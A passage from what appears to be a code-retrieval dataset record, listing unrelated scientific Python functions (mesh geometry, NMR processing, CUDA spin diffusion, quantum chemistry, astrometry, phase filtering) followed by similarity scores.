-1.0*np.sqrt(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)\n dzdxi1 = 1.0*zb*0.5*(1.0 - xx/2.0 - yy/2.0 + 
xx*yy/3.0)**-0.5 * (-xb+2.0*xb*yy/3.0)\n dzdxi2 = -1.0*zb*0.5*(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)**-0.5 * (-yb+2.0*xx*yb/3.0)\n J = np.array([[dxdxi1,dxdxi2],[dydxi1,dydxi2],[dzdxi1,dzdxi2]]).T\n J = np.cross(J[:,0,:],J[:,1,:])\n return np.sqrt(np.sum(J**2,axis=1))\n mesh.eList[4].vals = posZvals\n mesh.eList[4].normals = posZnormals\n mesh.eList[4].J = posZJ\n \n # z=-1 side\n def negZvals(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=np.array(xi1);yb=np.array(xi2);zb=-np.ones(xi1.shape);\n xx=xb**2;yy=yb**2;zz=zb**2;\n x = xb*np.sqrt(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)\n y = yb*np.sqrt(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)\n z = zb*np.sqrt(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)\n return np.vstack([x,y,z])\n def negZnormals(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=np.array(xi1);yb=np.array(xi2);zb=-np.ones(xi1.shape);\n xx=xb**2;yy=yb**2;zz=zb**2;\n dxdxi1 = 1.0*np.sqrt(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)\n dxdxi2 = 1.0*xb*0.5*(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)**-0.5 * (-yb+2.0*yb*zz/3.0)\n dydxi1 = 1.0*yb*0.5*(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)**-0.5 * (-xb+2.0*xb*zz/3.0)\n dydxi2 = 1.0*np.sqrt(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)\n dzdxi1 = 1.0*zb*0.5*(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)**-0.5 * (-xb+2.0*xb*yy/3.0)\n dzdxi2 = 1.0*zb*0.5*(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)**-0.5 * (-yb+2.0*xx*yb/3.0)\n J = np.array([[dxdxi1,dxdxi2],[dydxi1,dydxi2],[dzdxi1,dzdxi2]]).T\n J = np.cross(J[:,0,:],J[:,1,:])\n magnitude = np.sqrt(np.sum(J**2,axis=1))\n return J.T/magnitude\n def negZJ(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=np.array(xi1);yb=np.array(xi2);zb=-np.ones(xi1.shape);\n xx=xb**2;yy=yb**2;zz=zb**2;\n dxdxi1 = 1.0*np.sqrt(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)\n dxdxi2 = 1.0*xb*0.5*(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)**-0.5 * (-yb+2.0*yb*zz/3.0)\n dydxi1 = 1.0*yb*0.5*(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)**-0.5 * (-xb+2.0*xb*zz/3.0)\n dydxi2 = 1.0*np.sqrt(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)\n dzdxi1 = 1.0*zb*0.5*(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)**-0.5 * (-xb+2.0*xb*yy/3.0)\n dzdxi2 = 1.0*zb*0.5*(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)**-0.5 * (-yb+2.0*xx*yb/3.0)\n J = np.array([[dxdxi1,dxdxi2],[dydxi1,dydxi2],[dzdxi1,dzdxi2]]).T\n J = np.cross(J[:,0,:],J[:,1,:])\n return np.sqrt(np.sum(J**2,axis=1))\n mesh.eList[5].vals = negZvals\n mesh.eList[5].normals = negZnormals\n mesh.eList[5].J = negZJ\n \n for e in mesh.eList:\n e.ExactElement = True\n \n return mesh", "def proz(): \r\n print(\"processing: \",CURDATA()[0]) \r\n Check_180turn(left_boundary,right_boundary)\r\n EF() #exponential window multiplication + fourier\r\n APK0() #1. Phase correction 0th Ordnung\r\n APK1() #1. 
Phase correction 1st Ordnung\r\n ABS() #Baseline correction\r\n APK()\r\n ABS() #Baseline correction\r\n Check_180turn(left_boundary,right_boundary)", "def cuda_step_plane(positions, g_x, g_y, g_z, phases, rng_states, time_point, n_of_spins, gamma, step_length, dt, directions):\n \n # Global thread index on a 1D grid\n thread_id = cuda.grid(1)\n if thread_id >= n_of_spins:\n return\n\n # Allocate local memory\n step = cuda.local.array(3, numba.double)\n\n # Generate random step\n phi = xoroshiro128p_uniform_float64(rng_states, thread_id) * 6.283185307179586\n step[0] = math.cos(phi) * directions[0] + math.sin(phi) * directions[3]\n step[1] = math.cos(phi) * directions[1] + math.sin(phi) * directions[4]\n step[2] = math.cos(phi) * directions[2] + math.sin(phi) * directions[5]\n step[0] = step_length * step[0]\n step[1] = step_length * step[1]\n step[2] = step_length * step[2]\n\n # Update positions\n positions[0, thread_id] = positions[0, thread_id] + step[0]\n positions[1, thread_id] = positions[1, thread_id] + step[1]\n positions[2, thread_id] = positions[2, thread_id] + step[2]\n \n # Calculate phase shift\n for measurement in range(g_x.shape[1]):\n phases[measurement, thread_id] += gamma * dt * \\\n (g_x[time_point, measurement] * positions[0, thread_id] + \\\n g_y[time_point, measurement] * positions[1, thread_id] + \\\n g_z[time_point, measurement] * positions[2, thread_id])", "def phase(self):\n return np.arctan(np.sum(np.imag(self.values)) / np.sum(np.real(self.values)))", "def get_phases(t,P,t0):\n if type(t) is not float:\n phase = ((t - np.median(t0))/np.median(P)) % 1\n ii = np.where(phase>=0.5)[0]\n phase[ii] = phase[ii]-1.0\n else: \n phase = ((t - np.median(t0))/np.median(P)) % 1\n if phase>=0.5:\n phase = phase - 1.0\n return phase", "def F_trans(self):\n common_scale = self.edp_par['common_scale'].value\n R_HM = self.edp_par['R_HM'].value\n X_h = self.edp_par['X_h'].value\n psi = self.edp_par['psi'].value \n arg = self.qz*X_h*np.cos(psi) - self.qx*X_h*np.sin(psi)\n return common_scale * (R_HM*np.cos(arg) - 1)", "def prob4(d = 500): \n #import the plane data\n planeData = np.load(\"plane.npy\")\n \n tplane = planeData[:,0]\n alpha = np.deg2rad(planeData[:,1])\n beta = np.deg2rad(planeData[:,2])\n \n l = len(tplane)\n \n #define x and y functions\n def x(n):\n# Gives x position\n return d * np.tan(beta[n]) / (np.tan(beta[n]) - np.tan(alpha[n]))\n def y(n):\n# Gives y position\n return d * np.tan(beta[n]) * np.tan(alpha[n]) / (np.tan(beta[n]) - np.tan(alpha[n]))\n \n #define x and y prime as we will see them\n def xprime(n):\n# Gives the approximate derivative of x\n if n == 0:\n return fdq1(x, n, h = 1)\n elif n == l-1:\n return bdq1(x, n, h = 1)\n elif n > 0 and n < l:\n return cdq2(x, n, h = 1)\n else:\n return 0\n \n def yprime(n):\n# Gives the approximate derivative of y\n if n == 0:\n return fdq1(y, n, h = 1)\n elif n == l-1:\n return bdq1(y, n, h = 1)\n elif n > 0 and n < l:\n return cdq2(y, n, h = 1)\n else:\n return 0\n \n #define speed from x and y prime\n def speed(n):\n# print(\"speed(n) where n = \" + str(n))\n return np.sqrt((xprime(n))**2 + (yprime(n))**2)\n \n #Finally get the speed from the information we have\n spd = []\n X = []\n Y = []\n for i in range(0, l):\n spd.append(speed(i))\n X.append(x(i))\n Y.append(y(i))\n \n return spd\n \n raise NotImplementedError(\"Problem 4 Incomplete\")", "def parse_phase (self, ph):\n\n l = ph.split ()\n dist = l[0] # in degrees\n name = l[2]\n time = l[3]\n\n #print (time)\n\n return [name, time, dist]", "def 
_apply_array_spin1234(self, h1e: 'Nparray', h2e: 'Nparray',\n h3e: 'Nparray', h4e: 'Nparray') -> 'Nparray':\n norb = self.norb()\n tno = 2 * norb\n assert h4e.shape == (tno, tno, tno, tno, tno, tno, tno, tno)\n lena = self.lena()\n lenb = self.lenb()\n\n nh1e = numpy.copy(h1e)\n nh2e = numpy.copy(h2e)\n nh3e = numpy.copy(h3e)\n\n if fqe.settings.use_accelerated_code:\n _make_nh123(norb, h4e, nh1e, nh2e, nh3e)\n else:\n for i in range(norb * 2):\n for j in range(norb * 2):\n for k in range(norb * 2):\n nh1e[:, :] -= h4e[:, j, i, k, j, i, k, :]\n for l in range(norb * 2):\n nh2e[i, j, :, :] += (h4e[j, l, i, k, l, k, :, :] +\n h4e[i, j, l, k, l, k, :, :] +\n h4e[i, l, k, j, l, k, :, :] +\n h4e[j, i, k, l, l, k, :, :] +\n h4e[i, k, j, l, k, :, l, :] +\n h4e[j, i, k, l, k, :, l, :] +\n h4e[i, j, k, l, :, k, l, :])\n nh3e[i, j, k, :, :, :] += (\n h4e[k, i, j, l, l, :, :, :] +\n h4e[j, i, l, k, l, :, :, :] +\n h4e[i, l, j, k, l, :, :, :] +\n h4e[i, k, j, l, :, l, :, :] +\n h4e[i, j, l, k, :, l, :, :] +\n h4e[i, j, k, l, :, :, l, :])\n\n (dveca, dvecb) = self.calculate_dvec_spin()\n evecaa = numpy.zeros((norb, norb, norb, norb, lena, lenb),\n dtype=self._dtype)\n evecab = numpy.zeros((norb, norb, norb, norb, lena, lenb),\n dtype=self._dtype)\n evecba = numpy.zeros((norb, norb, norb, norb, lena, lenb),\n dtype=self._dtype)\n evecbb = numpy.zeros((norb, norb, norb, norb, lena, lenb),\n dtype=self._dtype)\n for i in range(norb):\n for j in range(norb):\n tmp = self._calculate_dvec_spin_with_coeff(dveca[i, j, :, :])\n evecaa[:, :, i, j, :, :] = tmp[0][:, :, :, :]\n evecba[:, :, i, j, :, :] = tmp[1][:, :, :, :]\n\n tmp = self._calculate_dvec_spin_with_coeff(dvecb[i, j, :, :])\n evecab[:, :, i, j, :, :] = tmp[0][:, :, :, :]\n evecbb[:, :, i, j, :, :] = tmp[1][:, :, :, :]\n\n out = self._apply_array_spin123(nh1e, nh2e, nh3e, (dveca, dvecb),\n (evecaa, evecab, evecba, evecbb))\n\n def ncon(A, B):\n \"\"\"Tensor contraction and transposition corresponding with\n einsum 'ikmojlnp,mnopxy->ijklxy'\n \"\"\"\n return numpy.transpose(numpy.tensordot(A,\n B,\n axes=((2, 6, 3, 7), (0, 1, 2,\n 3))),\n axes=(0, 2, 1, 3, 4, 5))\n\n n = norb # shorter\n nevecaa = ncon(h4e[:n, :n, :n, :n, :n, :n, :n, :n], evecaa) \\\n + 2.0 * ncon(h4e[:n, :n, :n, n:, :n, :n, :n, n:], evecab) \\\n + ncon(h4e[:n, :n, n:, n:, :n, :n, n:, n:], evecbb)\n\n nevecab = ncon(h4e[:n, n:, :n, :n, :n, n:, :n, :n], evecaa) \\\n + 2.0 * ncon(h4e[:n, n:, :n, n:, :n, n:, :n, n:], evecab) \\\n + ncon(h4e[:n, n:, n:, n:, :n, n:, n:, n:], evecbb)\n\n nevecbb = ncon(h4e[n:, n:, :n, :n, n:, n:, :n, :n], evecaa) \\\n + 2.0 * ncon(h4e[n:, n:, :n, n:, n:, n:, :n, n:], evecab) \\\n + ncon(h4e[n:, n:, n:, n:, n:, n:, n:, n:], evecbb)\n\n dveca2 = numpy.zeros(dveca.shape, dtype=self._dtype)\n dvecb2 = numpy.zeros(dvecb.shape, dtype=self._dtype)\n for i in range(norb):\n for j in range(norb):\n dveca[:, :, :, :] = nevecaa[i, j, :, :, :, :]\n dvecb[:, :, :, :] = nevecab[i, j, :, :, :, :]\n cvec = self._calculate_coeff_spin_with_dvec((dveca, dvecb))\n dveca2[i, j, :, :] += cvec[:, :]\n\n dveca[:, :, :, :] = nevecab[:, :, i, j, :, :]\n dvecb[:, :, :, :] = nevecbb[i, j, :, :, :, :]\n cvec = self._calculate_coeff_spin_with_dvec((dveca, dvecb))\n dvecb2[i, j, :, :] += cvec[:, :]\n\n out += self._calculate_coeff_spin_with_dvec((dveca2, dvecb2))\n return out", "def _like4(init_par, alpha, delta, plx_obs, mualpha_obs, mudelta_obs, vrad_obs, sigma_obs, sigma_vrad, ccoef, i):\r\n\t\r\n\tplx_mod, v, sigma_v = init_par[i], init_par[-4:-1], init_par[-1] \r\n\tp, q, r = 
normalTriad(alpha, delta)\r\n\tmualpha_mod = np.dot(np.transpose(p),v)*plx_mod/_A ### [mas/yr]\r\n\tmudelta_mod = np.dot(np.transpose(q),v)*plx_mod/_A ### [mas/yr]\r\n\t### Add the model vector for the radial velocities:\r\n\tvrad_mod = np.dot(np.transpose(r),v) ### [km/s]\r\n \t\r\n\tsigma_plx, sigma_mualpha, sigma_mudelta = np.transpose(sigma_obs)\r\n\tC = np.zeros((4,4),dtype=np.float64) ### This is a 4x4 matrix \r\n\t### Diagonal terms:\r\n\tC[0,0],C[1,1],C[2,2] = sigma_plx**2.,sigma_mualpha**2., sigma_mudelta**2.\r\n\tC[3,3] = sigma_vrad**2.\r\n\t\r\n\tr_plx_muRa, r_plx_muDec, r_muRa_muDec = ccoef[0], ccoef[1], ccoef[2] \r\n \r\n\t### Correlation terms:\r\n\tC[0,1], C[0,2] = r_plx_muRa*sigma_plx*sigma_mualpha, r_plx_muDec*sigma_plx*sigma_mudelta\r\n\tC[1,0], C[1,2] = r_plx_muRa*sigma_plx*sigma_mualpha, r_muRa_muDec*sigma_mualpha*sigma_mudelta\r\n\tC[2,0], C[2,1] = r_plx_muDec*sigma_plx*sigma_mudelta, r_muRa_muDec*sigma_mualpha*sigma_mudelta\r\n\r\n\tE = np.zeros((4,4),dtype=np.float64) ### 4x4 matrix \r\n\tE[1,1],E[2,2] = (sigma_v**2.)*(plx_mod/_A)**2., (sigma_v**2.)*(plx_mod/_A)**2. ### [mas/yr]\r\n\tE[3,3] = sigma_v**2.\t\t\t\t\t\t\t\t ### [km/s]\r\n\r\n\t\r\n\tD = np.add(E,C)\r\n\tdetD = det(D) \r\n\tinvD = inv(D)\r\n\t\t\r\n\ta_c = np.array([plx_obs - plx_mod, mualpha_obs - mualpha_mod, mudelta_obs-mudelta_mod, vrad_obs - vrad_mod])\r\n\tg_func = row_matrix_col_4d(a_c, a_c, invD) \r\n\t\r\n\t\r\n\treturn detD, g_func", "def pro_avfid_superoperator_phasecorrected(U,phases):\n Ucorrection = qtp.Qobj([[np.exp(-1j*np.deg2rad(phases[0])), 0, 0, 0, 0, 0, 0, 0, 0],\n [0, np.exp(-1j*np.deg2rad(phases[1])), 0, 0, 0, 0, 0, 0, 0],\n [0, 0, np.exp(-1j*np.deg2rad(phases[4]-phases[-1])), 0, 0, 0, 0, 0, 0],\n [0, 0, 0, np.exp(-1j*np.deg2rad(phases[2])), 0, 0, 0, 0, 0],\n [0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[3]-phases[-1])), 0, 0, 0, 0],\n [0, 0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[4]-phases[-1]+phases[2]-phases[0])), 0, 0, 0],\n [0, 0, 0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[5])), 0, 0],\n [0, 0, 0, 0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[5]+phases[1]-phases[0])), 0],\n [0, 0, 0, 0, 0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[4]-phases[-1]+phases[5]-phases[0]))]],\n type='oper',\n dims=[[3, 3], [3, 3]])\n\n if U.type=='oper':\n U=Ucorrection*U\n ptrace = np.abs((U.dag()*U_target).tr())**2\n dim = 9 # dimension of the whole space\n return np.real((ptrace+dim)/(dim*(dim+1)))\n\n elif U.type=='super':\n U=qtp.to_super(Ucorrection)*U\n return np.real(qtp.average_gate_fidelity(U,target=U_target_diffdims))", "def getRFFieldMap(self, phase=0):\n # TODO: we might want to see something else for a multi-cell cavity\n return np.sum([norm_E(self.z_array) * self.rf_peak_field * 1e6 * np.cos(pho + phase)\n for norm_E, pho in zip(self.norm_E, self.phase_offset)], 0)", "def filter_wrapped_phase(image, k):\n ny, nx = image.shape\n assert(ny == nx) ## assert a square image for simplicity\n if (k%2 == 0):\n print(\"k has to be an integer!\")\n return\n N = nx\n i, j = np.arange(N), np.arange(N)\n ii, jj = np.meshgrid(i, j)\n filt_psi = np.zeros((N,N))\n\n inside = (jj[k/2:N-(k/2), k/2:N-(k/2)].flatten(), ii[k/2:N-(k/2), k/2:N-(k/2)].flatten())\n krange = np.linspace(-1 * (k/2), (k/2), k, dtype = 'int64') ## amount of added spaces, if k = 5, it ranges from -2 to 2\n krange_tile = np.tile(krange * N, (k, 1)).T ## tile them to make a (k/2)**2 matrix, containing for instance -2N, -N, 0, N, 2N for k=5\n k_tile = np.tile(krange, (k, 1)) ## tile to add to krange_tile\n coords_add = (krange_tile + k_tile).flatten() 
## all coordinates, in a (k/2)**2 matrix, from -2N - 2: -2N + 2, -N-2 : -N+2 , -2 : 2, N -2 : N +2, 2N -2 : 2N +2\n inside = np.ravel_multi_index(inside, (N, N))\n coords_add = np.tile(coords_add, (len(inside), 1)) ## stack all differences to add to inside\n inside_tile = np.tile(inside, (coords_add.shape[1],1)).T ## stack all inside to add to differences\n all_coords = inside_tile + coords_add### a matrix of len(inside) x (k/2)**2 with all coordinates in a k x k square around a certain coordinate\n unrav_coords = np.unravel_index(all_coords, (N, N)) ## unraveled coordinates of all coordinates\n sum_sin_psi = np.sum(np.sin(image[unrav_coords]), axis = 1) ## sum over a sin (psi) over a k x k square\n sum_cos_psi = np.sum(np.cos(image[unrav_coords]), axis = 1) ## sum over a cos (psi) over a k x k square\n psi_app = np.arctan2(sum_sin_psi, sum_cos_psi)\n filt_psi[np.unravel_index(inside, (N, N))] = psi_app \n\n #### top layers\n for i in range(k/2):\n ## for indices directly above the \"inside square\"\n top = (jj[i, k/2:N-(k/2)].flatten(), ii[i, k/2: N - (k/2)].flatten())\n coords_add = (krange_tile + k_tile)[(k/2)-i:, :].flatten()\n top = np.ravel_multi_index(top, (N, N))\n coords_add = np.tile(coords_add, (len(top), 1))\n top_tile = np.tile(top, (coords_add.shape[1],1)).T\n top_coords = top_tile + coords_add\n unrav_coords = np.unravel_index(top_coords, (N, N))\n sum_sin_top = np.sum(np.sin(image[unrav_coords]), axis = 1)\n sum_cos_top = np.sum(np.cos(image[unrav_coords]), axis = 1)\n psi_top = np.arctan2(sum_sin_top, sum_cos_top)\n filt_psi[np.unravel_index(top, (N, N))] = psi_top\n\n ## indices directly below the \"inside square\"\n bot = (jj[N- 1 - i, k/2:N-(k/2)].flatten(), ii[N-1-i, k/2: N - (k/2)].flatten()) ## starting at the bottom working inwards\n coords_add = (krange_tile + k_tile)[:(k/2) + 1 + i, :].flatten()\n bot = np.ravel_multi_index(bot, (N, N))\n coords_add = np.tile(coords_add, (len(top), 1))\n bot_tile = np.tile(bot, (coords_add.shape[1],1)).T\n bot_coords = bot_tile + coords_add\n unrav_coords = np.unravel_index(bot_coords, (N, N))\n sum_sin_bot = np.sum(np.sin(image[unrav_coords]), axis = 1)\n sum_cos_bot = np.sum(np.cos(image[unrav_coords]), axis = 1)\n psi_bot = np.arctan2(sum_sin_bot, sum_cos_bot)\n filt_psi[np.unravel_index(bot, (N, N))] = psi_bot\n\n ## indices directly left of the \"inside square\"\n left = (jj[k/2:N-(k/2), i].flatten(), ii[k/2:N-(k/2), i].flatten()) ## starting at the bottom working inwards\n coords_add = (krange_tile + k_tile)[:, (k/2)-i:].flatten()\n left = np.ravel_multi_index(left, (N, N))\n coords_add = np.tile(coords_add, (len(left), 1))\n left_tile = np.tile(left, (coords_add.shape[1],1)).T\n left_coords = left_tile + coords_add\n unrav_coords = np.unravel_index(left_coords, (N, N))\n sum_sin_left = np.sum(np.sin(image[unrav_coords]), axis = 1)\n sum_cos_left = np.sum(np.cos(image[unrav_coords]), axis = 1)\n psi_left = np.arctan2(sum_sin_left, sum_cos_left)\n filt_psi[np.unravel_index(left, (N, N))] = psi_left\n\n ## indices directly left of the \"inside square\"\n right = (jj[k/2:N-(k/2), N - 1 - i].flatten(), ii[k/2:N-(k/2), N - 1 - i].flatten()) ## starting at the bottom working inwards\n coords_add = (krange_tile + k_tile)[:, :(k/2)+1+i].flatten()\n right = np.ravel_multi_index(right, (N, N))\n coords_add = np.tile(coords_add, (len(right), 1))\n right_tile = np.tile(right, (coords_add.shape[1],1)).T\n right_coords = right_tile + coords_add\n unrav_coords = np.unravel_index(right_coords, (N, N))\n sum_sin_right = 
np.sum(np.sin(image[unrav_coords]), axis = 1)\n sum_cos_right = np.sum(np.cos(image[unrav_coords]), axis = 1)\n psi_right = np.arctan2(sum_sin_right, sum_cos_right)\n filt_psi[np.unravel_index(right, (N, N))] = psi_right\n \n ## calculate boundaries diagonals\n left_t, right_t, left_b, right_b = (i, i), (i, -1 -i), (-1 - i, i), (-1 - i, -1 - i) \n left_t, right_t, left_b, right_b = (jj[left_t], ii[left_t]), (jj[right_t], ii[right_t]), (jj[left_b], ii[left_b]), (jj[right_b], ii[right_b])\n left_t, right_t, left_b, right_b = np.ravel_multi_index(left_t, (N, N)), np.ravel_multi_index(right_t, (N, N)), np.ravel_multi_index(left_b, (N, N)), np.ravel_multi_index(right_b, (N, N))\n coord_mat = krange_tile + k_tile\n coords_add_lt, coords_add_rt, coords_add_lb, coords_add_rb = coord_mat[(k/2)-i:, (k/2)-i:].flatten(), coord_mat[(k/2)-i:, :(k/2)+1+i].flatten(), coord_mat[:(k/2)+i+1, (k/2)-i:].flatten(), coord_mat[:(k/2)+i+1, :(k/2)+i+1].flatten()\n coords_add_tot = np.vstack((coords_add_lt, coords_add_rt, coords_add_lb, coords_add_rb))\n lt_tile, rt_tile, lb_tile, rb_tile = np.tile(left_t, (coords_add_lt.shape[0],1)).T, np.tile(right_t, (coords_add_lt.shape[0],1)).T, np.tile(left_b, (coords_add_lt.shape[0],1)).T, np.tile(right_b, (coords_add_lt.shape[0],1)).T\n coords_tile_tot = np.squeeze(np.stack((lt_tile, rt_tile, lb_tile, rb_tile)))\n coords_tot = coords_add_tot + coords_tile_tot\n unrav_coords = np.unravel_index(coords_tot, (N, N))\n sum_sin_diag = np.sum(np.sin(image[unrav_coords]), axis = 1)\n sum_cos_diag = np.sum(np.cos(image[unrav_coords]), axis = 1)\n psi_diag = np.arctan(sum_sin_diag, sum_cos_diag)\n filt_psi[np.unravel_index(np.stack((left_t, right_t, left_b, right_b)), (N, N))] = psi_diag\n\n return filt_psi", "def test_normalized_beamsplitter_output(self, setup_backend, t, r_phi, tol):\n\n backend = setup_backend(2)\n\n backend.displacement(ALPHA, np.pi / 3, 1)\n backend.beamsplitter(np.arccos(t), r_phi, 0, 1)\n state = backend.state()\n tr = state.trace()\n assert np.allclose(tr, 1, atol=tol, rtol=0)" ]
[ "0.6671196", "0.64827406", "0.6373965", "0.6372035", "0.6084464", "0.60772616", "0.6052406", "0.59829885", "0.5869289", "0.5851694", "0.580842", "0.58041", "0.5711219", "0.5682935", "0.5637525", "0.5630165", "0.5624642", "0.56207854", "0.5617892", "0.5615495", "0.5611847", "0.56065875", "0.5606309", "0.55991685", "0.5598589", "0.557845", "0.5576333", "0.5569804", "0.55685985", "0.5544888", "0.5541166", "0.55364704", "0.55224335", "0.551738", "0.54781574", "0.54571337", "0.5452817", "0.5450786", "0.54360205", "0.5427854", "0.5387737", "0.5377662", "0.5377316", "0.5372418", "0.5369332", "0.5369174", "0.5365837", "0.535905", "0.5358913", "0.5347659", "0.53451294", "0.5344258", "0.5344094", "0.5341308", "0.53387314", "0.5331643", "0.53229576", "0.53229576", "0.5321171", "0.5320759", "0.5315379", "0.531526", "0.53146046", "0.5312059", "0.53095746", "0.5309008", "0.5308353", "0.52910733", "0.52830744", "0.5280103", "0.526952", "0.5262084", "0.52562696", "0.5254502", "0.525405", "0.5249117", "0.5241375", "0.5232895", "0.5229758", "0.52274513", "0.5219376", "0.5207444", "0.5199935", "0.5198852", "0.5183357", "0.51806587", "0.5180325", "0.5176328", "0.5174787", "0.51689255", "0.5167113", "0.5166428", "0.5165783", "0.51633334", "0.51584476", "0.5155426", "0.5154421", "0.5154059", "0.5149019", "0.51459175" ]
0.6127306
4
We want to use this function to analyze which part of the bunch is on axis in each undulator section.
def analyze_on_axis(phase_space, id_begin, id_end, ds_slice, zplot):
    ps = phase_space[:, (id_begin-1):id_end, :]
    # print(np.shape(ps))
    # ps = ps[numpy.logical_not(numpy.isnan(ps))]
    x = ps[0, :, :]
    px = ps[1, :, :]
    y = ps[2, :, :]
    py = ps[3, :, :]

    id_on_axis = np.zeros((4, int(id_end-id_begin+1)))

    for n in range(int(id_end-id_begin+1)):
        x_this = x[n, :]
        px_this = px[n, :]
        y_this = y[n, :]
        py_this = py[n, :]

        # Remove all NaN elements in the phase space array
        x_this = x_this[np.logical_not(np.isnan(x_this))]
        px_this = px_this[np.logical_not(np.isnan(px_this))]
        y_this = y_this[np.logical_not(np.isnan(y_this))]
        py_this = py_this[np.logical_not(np.isnan(py_this))]

        ## Plot X
        plt.subplot(2, 2, 1)
        plt.plot(zplot[0:len(x_this)]*1e+6, x_this*1e+6)
        plt.ylabel('Position in X/ $\mu$m', fontsize=10)

        ## Plot Y
        plt.subplot(2, 2, 2)
        plt.plot(zplot[0:len(y_this)]*1e+6, y_this*1e+6)
        plt.ylabel('Position in Y/ $\mu$m', fontsize=10)

        ## Plot px
        plt.subplot(2, 2, 3)
        plt.plot(zplot[0:len(px_this)]*1e+6, px_this)
        plt.ylabel('Angle in X', fontsize=10)

        ## Plot py
        plt.subplot(2, 2, 4)
        plt.plot(zplot[0:len(py_this)]*1e+6, py_this)
        plt.ylabel('Angle in Y', fontsize=10)

        # plt.xlabel('Longitudinal Direction of the Bunch $s$/ $\mu$m')
        # plt.title('First Undulator Section')
        # plt.title('Second Undulator Section')
        # plt.title('Third Undulator Section')

        id_on_axis[0, n] = np.argmin(np.abs(x_this))
        id_on_axis[1, n] = np.argmin(np.abs(px_this))
        id_on_axis[2, n] = np.argmin(np.abs(y_this))
        id_on_axis[3, n] = np.argmin(np.abs(py_this))

    fig = plt.gcf()
    fig.set_size_inches(13.5, 9)
    ax = plt.gca()
    ax.yaxis.get_major_formatter().set_powerlimits((0,1))
    fig.savefig('phase_space_U3_new.png', dpi=100)
    plt.show()

    s_on_axis = np.average(id_on_axis[2:4,:])*ds_slice

    return id_on_axis, s_on_axis
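A minimal usage sketch for analyze_on_axis, assuming numpy and matplotlib.pyplot are imported as np and plt (as the snippet above presumes) and that the function is defined in the same module; the synthetic phase_space shape, slice indices, ds_slice, and zplot values below are illustrative assumptions, not values from the original record.

import numpy as np
import matplotlib.pyplot as plt

# Hypothetical inputs (illustrative only): 6D phase space for 200 slices
# and 500 macro-particles; in real data, NaN entries mark lost particles.
phase_space = np.random.randn(6, 200, 500) * 1e-6
ds_slice = 1.0e-6                      # assumed slice length [m]
zplot = np.arange(500) * ds_slice      # longitudinal coordinate per particle

# Analyze slices 50..100 (1-based id_begin/id_end, as used in the function body).
id_on_axis, s_on_axis = analyze_on_axis(phase_space, id_begin=50, id_end=100,
                                        ds_slice=ds_slice, zplot=zplot)
print(id_on_axis.shape)  # (4, 51): on-axis particle index for x, px, y, py per slice
print(s_on_axis)         # mean on-axis index from the y/py rows, scaled by ds_slice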
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def othersn(ax):", "def _sections(self, axis=None, direction=None, cycle=None,\n concat_direction=False, concat_cycle=False, info=False,\n **kwargs):\n if axis is None:\n axis = ['x', 'y']\n if direction is None:\n direction = ['left', 'right']\n else:\n # A direction was chosen, prevent concat\n concat_direction = False\n if isinstance(direction, str):\n direction = [direction]\n if cycle is None:\n cycle = ['stress', 'release']\n else:\n # A cycle was chosen, prevent concat\n concat_cycle = False\n if isinstance(cycle, str):\n cycle = [cycle]\n\n sections = np.empty((0, 2), dtype=int)\n infos = np.empty((0, 3), dtype=str)\n\n # Get all requested segments\n # for ax, axi in zip(axis, range(len(axis))):\n for ax in axis:\n # separate release/stress and separate left/right -> x/y,\n # right/left, stress/release\n if not concat_cycle:\n for sec, dc in zip([d + c for d in direction for c in cycle],\n [[d, c] for d in direction for c in cycle]):\n for segment in self._sf.sections[ax]:\n sections = np.r_[sections, segment[sec]]\n if len(segment[sec]) > 0:\n seg_info = np.array([[ax, dc[0], dc[1]]]\n * len(segment[sec]))\n infos = np.r_[infos, seg_info]\n # concat release/stress and separate left/right -> x/y, right/left\n if concat_cycle and not concat_direction:\n # for d, di in zip(direction, range(len(direction))):\n for d in direction:\n for segment in self._sf.sections[ax]:\n sections = np.r_[sections, segment[d]]\n if len(segment[d]) > 0:\n seg_info = np.array([[ax, d, 'stressrelease']]\n * len(segment[d]))\n infos = np.r_[infos, seg_info]\n # concat release/stress and concat left/right -> x/y\n if concat_cycle and concat_direction:\n sections = np.r_[sections, self._sf.excited[ax]]\n if len(self._sf.excited[ax]) > 0:\n seg_info = np.array([[ax, 'leftright', 'stressrelease']]\n * len(self._sf.excited[ax]))\n infos = np.r_[infos, seg_info]\n\n if info:\n return sections, infos\n else:\n return sections", "def calc_axes(self):\n self.y_axis = np.linspace(0, self.image_shape[0] - 1, self.image_shape[0])\n self.x_axis = np.linspace(0, self.image_shape[1] - 1, self.image_shape[1])\n if hasattr(self, 'pixelsize'):\n self.y_axis *= self.pixelsize[0]\n self.x_axis *= self.pixelsize[1]\n\n # %%RETRIEVING FUNCTIONS", "def axis(ind):\n return ind % 15, ind // 15", "def analyze_natural_focusing(ps_beg, beamline, gamma, id_slices, zplot):\n\n ps_before = ps_beg\n\n count_UND = 0\n\n for element in beamline:\n ps_after = np.dot( element.M1, ps_before ) 